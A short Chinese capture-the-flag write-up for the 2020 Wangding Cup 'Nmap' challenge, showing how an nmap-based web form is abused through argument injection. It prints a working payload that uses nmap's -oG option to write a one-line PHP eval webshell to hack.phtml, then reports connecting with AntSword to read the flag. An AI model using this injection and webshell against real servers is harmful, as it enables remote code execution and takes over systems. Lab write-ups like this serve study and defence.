命令执行 [网鼎杯 2020 朱雀组]Nmap1

打开题目

输入127.0.0.1

可以得到回显结果,猜测是命令执行,尝试使用|分隔地址与命令

127.0.0.1 | ls

可以看到|\转义,尝试使用;

直接放入Payload:

' <?php @eval($_POST["hack"]);?> -oG hack.php '

尝试修改文件名后缀为phtml

' <?php @eval($_POST["hack"]);?> -oG hack.phtml '

加上扫描的地址:127.0.0.1

127.0.0.1 | ' <?= @eval($_POST["hack"]);?> -oG hack.phtml'

得到

查看扫描列表:

查看写入的文件,即访问hack.phtml

蚁剑连接

在根目录找到了flag

相关推荐
感谢地心引力6 小时前
安卓、苹果手机无线投屏到Windows
android·windows·ios·智能手机·安卓·苹果·投屏
优雅的潮叭10 小时前
cud编程之 reduce
android·redis·缓存
2601_9496130210 小时前
flutter_for_openharmony家庭药箱管理app实战+用药知识详情实现
android·javascript·flutter
一起养小猫10 小时前
Flutter for OpenHarmony 实战 表单处理与验证完整指南
android·开发语言·前端·javascript·flutter·harmonyos
2601_9499750810 小时前
flutter_for_openharmony城市井盖地图app实战+附近井盖实现
android·flutter
倾云鹤11 小时前
通用Digest认证
android·digest
我是阿亮啊11 小时前
Android 自定义 View 完全指南
android·自定义·自定义view·viewgroup
2601_9498333913 小时前
flutter_for_openharmony口腔护理app实战+意见反馈实现
android·javascript·flutter
峥嵘life13 小时前
Android 16 EDLA测试STS模块
android·大数据·linux·学习
TheNextByte113 小时前
如何打印Android手机联系人?
android·智能手机